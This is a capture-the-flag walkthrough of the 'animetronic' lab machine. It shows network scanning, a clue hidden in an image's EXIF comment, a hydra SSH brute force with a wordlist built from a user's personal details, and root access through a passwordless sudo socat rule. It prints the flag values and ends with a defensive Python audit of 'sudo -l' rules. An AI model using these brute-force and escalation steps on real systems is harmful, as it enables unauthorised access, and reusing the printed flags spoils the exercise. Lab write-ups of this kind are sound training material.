Target machine test

arp-scan
Use arp-scan to detect live hosts on the local network.
192.168.9.203 is the target machine's IP address.

port
Scan with nmap to get the target host's port information.
┌──(root㉿kali)-[/usr/share/seclists]
└─# nmap -sT -sV -O 192.168.9.203
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))

URL enumeration
Directory scan with dirsearch; the default wordlist does not find anything.
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r
[07:22:28] 301 - 312B - /img - http://192.168.9.203/img/
[07:22:33] 301 - 312B - /css - http://192.168.9.203/css/
[07:22:36] 301 - 311B - /js - http://192.168.9.203/js/
[07:38:24] 301 - 319B - /staffpages - http://192.168.9.203/staffpages/new_employees
[07:41:56] 403 - 278B - /server-status
[############ ] 60% 134151/220545 119/s job:1/1 errors:82
[5] 已停止 dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Got a picture; there must be something hidden in it.
wget http://192.168.9.203/staffpages/new_employees.jpg

exiftool
┌──(root㉿kali)-[~]
└─# exiftool new_employees.jpeg
ExifTool Version Number : 12.49
File Name : new_employees.jpeg
Directory : .
File Size : 160 kB
File Modification Date/Time : 2023:11:27 12:11:43-05:00
File Access Date/Time : 2024:05:10 05:52:41-04:00
File Inode Change Date/Time : 2024:05:10 05:53:33-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : page for you michael : ya/HnXNzyZDGg8ed4oCyZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo
Image Width : 703
Image Height : 1136
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 703x1136
Megapixels : 0.799

Puzzle within a puzzle
┌──(root㉿kali)-[~]
└─# echo ya/HnXNzyZDGg8ed4oCyZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן

After enough CTFs, one glance shows these are upside-down letters: message_for_michael
Visit /staffpages/message_for_michael

Hi Michael

Sorry for this complicated way of sending messages between us.
This is because I assigned a powerful hacker to try to hack
our server.

By the way, try changing your password because it is easy
to discover, as it is a mixture of your personal information
contained in this file personal_info.txt

Visit /staffpages/personal_info.txt
name: Michael
age: 27
birth date: 19/10/1996
number of children: 3 Ahmed - Yasser - Adam
Hobbies: swimming

password
Generate a password wordlist from the personal information.
leahcim
michael
19961019
19101996
michael1996
leahcim1996
...

Brute-force SSH with hydra:
┌──(root㉿kali)-[~]
└─# hydra -l michael -P password.txt ssh://192.168.9.203
[22][ssh] host: 192.168.9.203 login: michael password: leahcim1996

sudo privilege escalation
Found a user in the /home directory.
michael@animetronic:/home$ cd henry/
michael@animetronic:/home/henry$ ls
Note.txt user.txt
michael@animetronic:/home/henry$ cat user.txt
0833990328464efff1de6cd93067cfb7
michael@animetronic:/home/henry$ cat Note.txt
if you need my account to do anything on the server,
you will find my password in file named
aGVucnlwYXNzd29yZC50eHQK
michael@animetronic:/home/henry$ echo aGVucnlwYXNzd29yZC50eHQK | base64 -d
henrypassword.txt
michael@animetronic:/home/henry$ find / -name henrypassword.txt 2>/dev/null
/home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
michael@animetronic:/home/henry$ cat /home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
IHateWilliam
This is henry's password.
michael@animetronic:/home/henry$ su henry
Password:
henry@animetronic:~$ sudo -l
Matching Defaults entries for henry on animetronic:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User henry may run the following commands on animetronic:
    (root) NOPASSWD: /usr/bin/socat
henry@animetronic:~$ sudo socat stdin exec:/bin/bash
whoami
root
cd /root
ls
root.txt
cat root.txt
153a1b940365f46ebed28d74f142530f280a2c0a
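
The escalation above works because henry may run /usr/bin/socat as root without a password. As an added example (not part of the original writeup), here is a defender-side audit that parses `sudo -l` output and flags rules of that kind; the denylist `COMMAND_RUNNERS`, the function names and the sample text are assumptions made for illustration.

```python
import re

# Assumption: local denylist of programs that run arbitrary commands. socat is
# the one on this page; shells and interpreters run whatever they are given.
COMMAND_RUNNERS = {"socat", "bash", "sh", "python3", "perl"}

# Constructed sample: the rule from this page (Defaults shortened) plus a
# second rule that is not on the denylist.
SAMPLE = """Matching Defaults entries for henry on animetronic:
    env_reset, mail_badpass, use_pty

User henry may run the following commands on animetronic:
    (root) NOPASSWD: /usr/bin/socat
    (root) /usr/bin/systemctl reload apache2
"""

RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG = re.compile(r"^(?P<tag>[A-Z_]+):\s*")


def parse_rules(sudo_l_output):
    """Yield (runas, tags, command) for each rule in `sudo -l` output."""
    in_rules = False
    for line in sudo_l_output.splitlines():
        if line.startswith("User ") and line.rstrip().endswith(":"):
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        rest, tags = m.group("rest"), set()
        while (t := TAG.match(rest)):  # strip NOPASSWD:, SETENV:, ...
            tags.add(t.group("tag"))
            rest = rest[t.end():]
        for command in re.split(r",\s*(?=/|ALL\b)", rest):
            if command.strip():
                yield m.group("runas"), tags, command.strip()


def risky_rules(sudo_l_output):
    """Return (command, note) for rules that give command execution as root."""
    findings = []
    for runas, tags, command in parse_rules(sudo_l_output):
        as_root = any(u.strip() in ("root", "ALL") for u in re.split(r"[,:]", runas))
        program = command.split()[0].rsplit("/", 1)[-1]
        if as_root and (command == "ALL" or program in COMMAND_RUNNERS):
            note = "no password required" if "NOPASSWD" in tags else "password required"
            findings.append((command, note))
    return findings
```

On the sample, `risky_rules(SAMPLE)` reports only the socat rule.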